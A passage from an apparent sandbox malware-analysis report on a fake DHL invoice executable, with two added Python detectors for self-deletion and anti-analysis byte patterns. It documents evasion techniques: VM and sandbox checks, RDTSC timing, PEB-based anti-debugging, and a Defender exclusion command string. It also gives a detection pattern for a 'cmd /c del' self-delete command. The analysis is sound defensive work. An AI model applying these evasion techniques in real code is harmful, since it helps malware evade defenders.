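LINE_RE = re.compile(r"^Source:\s*(?P<parent>.*?)\s*\|?\s*Process created:\s*(?P<rest>.+)$")
# Heuristic for this report format: the image path ends at the first ".exe" that is
# followed by whitespace (or the end of the line); everything after it is arguments.
IMAGE_RE = re.compile(r"^(?P<image>.+?\.exe)(?:\s+.*)?$", re.IGNORECASE)
# cmd.exe /c del [switches] "<target>"  (the quotes are optional)
DEL_RE = re.compile(r'/c\s+del\s+(?:/\w+\s+)*"?(?P<target>[^"]+?)"?\s*$', re.IGNORECASE)


def parse_events(lines: List[str]) -> List[ProcEvent]:
    """Turn 'Process created' report lines into ProcEvent records; other lines are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        rest = m.group("rest").strip()
        im = IMAGE_RE.match(rest)
        if im:
            events.append(ProcEvent(m.group("parent"), im.group("image"), rest))
    return events


def ancestors(image: str, parent_of: Dict[str, str]) -> List[str]:
    """Walk the recorded parent links upwards from `image` (all paths lower-cased)."""
    chain: List[str] = []
    cur = image
    while cur in parent_of:
        nxt = parent_of[cur]
        if nxt == cur or nxt == "unknown" or nxt in chain:
            break
        chain.append(nxt)
        cur = nxt
    return chain


def self_delete_findings(events: List[ProcEvent]) -> List[Dict[str, object]]:
    """Flag cmd.exe '/c del' commands whose target is the image of a process seen in the run."""
    parent_of: Dict[str, str] = {}
    for ev in events:
        # keep the first parent recorded for an image (the sample re-spawns itself)
        parent_of.setdefault(ev.image.lower(), ev.parent.lower())
    known_images = {ev.image.lower() for ev in events} | {ev.parent.lower() for ev in events}

    findings = []
    for ev in events:
        if not ev.image.lower().endswith("\\cmd.exe"):
            continue
        m = DEL_RE.search(ev.cmdline)
        if not m:
            continue
        target = m.group("target").strip().lower()
        if target not in known_images:
            continue  # deleting some other file is not self-deletion
        chain = ancestors(ev.image.lower(), parent_of)
        findings.append({
            "deleted": target,
            "deleter_parent": ev.parent,
            "chain_above_cmd": chain,
            "target_is_ancestor": target in chain,
        })
    return findings


if __name__ == "__main__":
    for f in self_delete_findings(parse_events(REPORT_LINES)):
        print(f)
```

          On these lines the check fires once, and the ancestor walk from cmd.exe stops at explorer.exe without reaching the sample: the process that deletes the file is a Windows system binary (msdt.exe) that is not a descendant of the sample in the process tree, which is what the process hollowing and injection signatures in this report account for. A detection built only on parent/child lineage would therefore miss the self-deletion; matching the del target against every image seen in the run does not.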
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Process information set: NOOPENFILEERRORBOX (34 occurrences)
          Source: C:\Windows\SysWOW64\msdt.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: 00000000.00000002.363236510.00000000028A6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: invoice dhl.delivery document and original invoice sign.exe PID: 3452, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363236510.00000000028A6000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363236510.00000000028A6000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe | RDTSC instruction interceptor: First address: 0000000000709904 second address: 000000000070990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe | RDTSC instruction interceptor: First address: 0000000000709B7E second address: 0000000000709B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
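          Added example (not part of the Joe Sandbox report): a byte-pattern scanner, in Python, for three x86 constructs this report lists. The first is a push immediately followed by ret or retf, the stack-based jump in the "push C1F93286h; ret", "push eax; ret" and "push ss; retf" code-function entries under Data Obfuscation, which hides the real control-flow target from linear disassembly. The second is a pair of rdtsc instructions a few bytes apart, the timing check shown in the interceptor lines above, where the second rdtsc sits 6 bytes after the first and the elapsed count is compared against a threshold that a hypervisor trapping rdtsc or an instrumented sandbox tends to exceed. The third is "mov r32, fs:[30h]", the read of the PEB pointer from the 32-bit TEB that the anti-debugging entries further down list (the PEB holds BeingDebugged and NtGlobalFlag). The scanner works on raw bytes without disassembling, so it is a triage heuristic and every hit must be confirmed in a disassembler; the input bytes are hand-assembled for the example and the 0x401000 base address is assumed.

```python
import re
from typing import Dict, List

# Register names for the one-byte push opcodes and for the ModRM byte of "mov r32, fs:[disp32]".
PUSH_REG = {0x50: "eax", 0x51: "ecx", 0x52: "edx", 0x53: "ebx", 0x54: "esp",
            0x55: "ebp", 0x56: "esi", 0x57: "edi", 0x1E: "ds", 0x16: "ss"}
MOV_FS_REG = {0x05: "eax", 0x0D: "ecx", 0x15: "edx", 0x1D: "ebx", 0x35: "esi", 0x3D: "edi"}

# push imm32 (68 xx xx xx xx), push r32 (50..57), push ds (1E) or push ss (16),
# immediately followed by ret (C3) or retf (CB): an indirect jump via the stack.
PUSH_RET_RE = re.compile(rb"(?P<push>\x68[\x00-\xff]{4}|[\x50-\x57\x1e\x16])(?P<ret>[\xc3\xcb])")
# Two rdtsc (0F 31) with at most 16 bytes of code between them: a timing check.
RDTSC_PAIR_RE = re.compile(rb"\x0f\x31(?P<between>[\x00-\xff]{0,16}?)\x0f\x31")
# mov eax, fs:[0x30] (64 A1 30 00 00 00) or mov r32, fs:[0x30] (64 8B /r 30 00 00 00):
# fs:[0x30] is the PEB pointer in the 32-bit TEB.
PEB_READ_RE = re.compile(rb"\x64(?:\xa1|\x8b(?P<modrm>[\x05\x0d\x15\x1d\x35\x3d]))\x30\x00\x00\x00")

# Constructed input bytes (not taken from the sample): hand-assembled 32-bit x86.
SAMPLE_CODE = bytes.fromhex(
    "90 90"                    # 0x00: nop ; nop
    "68 86 32 f9 c1 c3"        # 0x02: push 0xC1F93286 ; ret   (same shape as 3_2_0041685A)
    "0f 31 31 c9 01 c1 0f 31"  # 0x08: rdtsc ; xor ecx,ecx ; add ecx,eax ; rdtsc
    "64 a1 30 00 00 00"        # 0x10: mov eax, dword ptr fs:[0x30]
    "50 c3"                    # 0x16: push eax ; ret
    "16 cb"                    # 0x18: push ss ; retf
    "c3"                       # 0x1a: ret on its own, must not be reported
)
BASE_VA = 0x401000  # assumed load address used only for the listing


def scan(code: bytes, base: int = 0) -> List[Dict[str, object]]:
    """Return the matches found in `code`, sorted by virtual address."""
    hits: List[Dict[str, object]] = []
    for m in PUSH_RET_RE.finditer(code):
        push = m.group("push")
        ret_name = "retf" if m.group("ret") == b"\xcb" else "ret"
        if push[0] == 0x68:
            target = int.from_bytes(push[1:], "little")  # the address the ret will jump to
            detail = f"push {target:#010x}; {ret_name}"
        else:
            detail = f"push {PUSH_REG[push[0]]}; {ret_name}"
        hits.append({"va": base + m.start(), "kind": "push-ret", "detail": detail})
    for m in RDTSC_PAIR_RE.finditer(code):
        delta = 2 + len(m.group("between"))  # offset of the second rdtsc from the first
        hits.append({"va": base + m.start(), "kind": "rdtsc-pair",
                     "detail": f"rdtsc pair, second rdtsc at +{delta}"})
    for m in PEB_READ_RE.finditer(code):
        modrm = m.group("modrm")
        reg = "eax" if modrm is None else MOV_FS_REG[modrm[0]]
        hits.append({"va": base + m.start(), "kind": "peb-read",
                     "detail": f"mov {reg}, dword ptr fs:[0x30]"})
    hits.sort(key=lambda h: h["va"])
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_CODE, BASE_VA):
        print(f"{h['va']:#010x}  {h['kind']:<10}  {h['detail']}")
```

          The rdtsc window of 16 bytes and the push/ret adjacency are deliberately tight so that ordinary compiler output rarely matches; widen them only with a disassembler in the loop, since a stray 0x50 or 0xC3 inside an immediate or a displacement will otherwise produce false hits.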
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe TID: 3576 | Thread sleep time: -40062s >= -30000s
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe TID: 5916 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6932 | Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Thread delayed: delay time: 40062
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Thread delayed: delay time: 922337203685477
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000000.374553794.00000000083E8000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.403668866.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.388071286.0000000006420000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.374553794.00000000083E8000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.390916923.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.390916923.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.403668866.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000005.00000000.365143157.000000000095C000.00000004.00000020.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0148B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0148B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0146C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0146B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0146B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01469100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01469100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01469100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01484120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01484120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01484120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01484120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01484120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0149513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0149513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014F41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0146B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0146B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0146B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0148C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0149A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01492990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014E69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_015249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_015249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_015249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_015249A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01480050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01480050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01522073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01531074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01534015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_01534015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0149002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0147B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0147B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0147B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_0147B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014FB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe | Code function: 3_2_014640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014640E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01493B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01493B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01471B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01471B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01535BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014F4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01478A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01483A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01465210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01465210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01465210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01465210 mov eax, dword ptr fs:[00000030h]
